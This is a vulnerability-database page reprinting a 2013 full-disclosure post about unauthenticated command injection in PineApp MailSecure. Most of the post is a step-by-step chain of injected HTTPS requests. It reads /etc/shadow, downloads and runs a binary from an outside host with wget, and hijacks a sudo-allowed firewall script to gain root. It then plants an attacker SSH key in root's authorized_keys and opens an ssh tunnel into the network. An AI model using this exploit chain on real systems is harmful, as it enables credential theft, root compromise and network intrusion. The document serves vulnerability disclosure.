Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PineApp MailSecure Command Execution

🗓️ 19 Nov 2013 00:00:00Reported by Ruben Garrote GarciaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

PineApp MailSecure Command Execution A vulnerability exists in PineApp MailSecure where an unprivileged user can execute arbitrary commands, upload and download files, achieve privilege escalation, and execute commands as root by sending specific https requests without authentication. This includes the potential for a backdoor and unauthorized access through an SSH key

Code
`Hi, related this:  
http://seclists.org/fulldisclosure/2013/Nov/136  
  
In February 2013 I send Pineapp the following information:  
-----------------------------------------------------------------  
It is possible execute any command bash as qmailq unprivilege user, sending  
only the following https request, without authentication.  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow  
  
To upload any file (script, binary, etc...) it is possible with wget  
command.  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile  
  
Download and execute it is possible with this request:  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile  
  
Details of bug:  
Lines 115-120 of /srv/www/htdocs/admin/confnetworking.html  
----------------snip-----------------  
<?  
$query=explode("\n",shell_exec("/usr/bin/host -t '$nstype' '$hostip'  
$nsserver"));  
foreach ($query as $line)  
if ($line)  
echo preg_replace("/\t/","&nbsp;&nbsp;&nbsp;",$line)."<br>\n";  
?>  
----------------snip-----------------  
  
Also it is possible make privilege escalation to root with a weak sudoers  
configuration, on /tmp/rc.firewall file. If you overwrite this file with  
this content:  
---------  
#!/bin/bash  
$1  
---------  
you must get a privileged backdoor.  
It is possible with the following request:  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%23!/bin/bash'  
> /tmp/fileheader  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'$1'  
> /tmp/filecode  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;mv/tmp/rc.firewall  
/tmp/rc.firewall_  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/fileheader  
/tmp/filecode > /tmp/rc.firewall  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx  
/tmp/rc.firewall  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/fileheader  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/filecode  
  
And execute commands as root with:  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx  
/tmp/rc.firewall 'whoami'  
  
With this, you can sent a private ssh key and get access by ssh service. To  
perform this you can make the following request:  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%73%73%68%2d%72%73%61%20%41%41%41%41%42%33%4e%7a%61%43%31%79%63%32%45%41%41%41%41%42%49%77%41%41%41%51%45%41%79%54%6f%4c%32%75%6b%51%36%4c%76%44%6a%78%51%65%4e%55%72%54%59%35%2b%51%66%57%37%47%51%52%4c%51%68%44%4f%69%77%7a%46%48%42%4a%66%33%59%66%49%44%50%6f%74%45%48%41%4d%43%7a%75%45%48%56%72%34%49%2f%41%77%52%73%78%76%4a%44%2b%4e%55%2b%2b%53%65%72%34%76%7a%35%4d%68%53%6c%50%37%64%47%53%78%47%58%39%31%37%7a%4b%53%53%4b%33%79%55%78%33%42%75%46%44%38%49%52%53%46%51%47%35%64%33%75%50%72%46%63%2f%4d%2b%33%61%37%30%4f%7a%45%44%2f%59%71%79%75%53%63%35%64%79%4c%64%67%59%32%61%47%77%6f%48%77%6a%4e%6f%5a%6b%79%65%44%77%72%67%63%2b%50%65%57%66%78%57%37%63%44%39%72%2f%4f%56%6d%38%59%49%61%70%7a%75%34%37%77%65%71%53%70%38%70%37%2b%43%58%4f%45%41%4c%64%2b%50%4e%54%79%4b%30%43%34%7a%51%58%37%72%35%6d%37%79%48%45%34%50%74%31%6f%75%41%43%45%6c%46%56%38%4a%4f%4f%45%38%4c%49%76%38%55%4a%67%57%30%43%64%41%55%4f%48%6a%49%75%2b%5a%6f%6d%35%54%71%50%73%72%6e%70%64%44%4e%59%6e%2b%76%33%6d%33%57%76%4f%50%71%36%66%69%38%61%72%79%53%33%61%4e%6e%7a%53%74%51%4e%5a%61%33%35%50%64%75%42%4a%49%39%33%4e%41%79%4f%48%54%59%54%31%75%56%6a%6c%79%55%51%3d%3d%20%72%75%62%65%6e%40%72%75%62%65%6e%2d%6c%61%70%74%6f%70'  
> /tmp/key.pub  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall  
'mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall  
'cp /root/.ssh/authorized_keys /tmp'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/authorized_keys  
/tmp/key.pub > /tmp/keys.pub  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall  
'mv /tmp/keys.pub /root/.ssh/authorized_keys'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall  
'chown root:root /root/.ssh/authorized_keys'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'killall  
sshd'  
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'sshd'  
  
This key have password: '1234'  
  
Now you can get access with ssh as root and up tun interface with the  
appliance with ssh client:  
ssh [email protected] -p 7022 -w0:0 -i /home/ruben/key  
  
With this the attacker have a VPN on the same network segment of MailSecure  
appliance vulnerable.  
-----------------------------------------------------------------  
  
This I made a live demo of vulnerability, but don't revealed the  
manufacturer, then the bugs was not fixed.  
http://boken00.blogspot.com.es/2012/11/ii-conferencias-de-seguridad-navaja.html  
  
Video demo will be release soon on my blog.  
  
Version affected:  
MailSecure <= 5099SK  
  
Credits:  
-----------  
Ruben Garrote García  
rubengarrote [at] gmail [dot] com  
http://boken00.blogspot.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Nov 2013 00:00Current
7.4High risk
Vulners AI Score7.4
pineapp mailsecurecommand executionvulnerabilityunprivileged userhttps requestauthenticationprivilege escalationbackdoorssh access
17